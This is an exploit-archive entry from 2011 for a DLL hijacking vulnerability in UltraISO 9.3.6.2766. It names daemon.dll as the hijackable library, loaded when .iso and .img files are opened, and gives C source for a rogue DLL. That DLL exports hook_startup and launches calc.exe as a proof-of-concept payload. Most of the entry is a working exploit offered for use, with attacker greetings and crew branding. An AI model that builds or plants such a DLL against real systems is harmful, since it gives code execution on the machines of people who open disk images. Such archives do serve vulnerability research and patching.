UltraISO 9.3.6.2766 DLL Hijacking Exploit

2011-07-18T00:00:00
ID 1337DAY-ID-16537
Type zdt
Reporter X-h4ck
Modified 2011-07-18T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            # Exploit Title : UltraISO 9.3.6.2766 DLL Hijacking Exploit
# Software link : http://www.ezbsystems.com/ultraiso/
# Version       : 9.3.6.2766
# Tested on     : Windows 7 Home Premium x86
# Date          : 18/07/2011
# Author        : X-h4ck
# Website       : http://www.pirate.al , http://theflashcrew.blogspot.com
# Email         : [email protected]
# Greetz        : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon 

# Vulnerable DLL & Extensions :
[x] daemon.dll = .iso, .img
# Vulnerable File :
[x] UltraISO.exe

//calc.exe :

#include <windows.h>
#define DllExport __declspec (dllexport)
 
DllExport void hook_startup() { PirateAL(); }
 
int PirateAL()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

# @PirateAL Crew



#  0day.today [2018-03-28]  #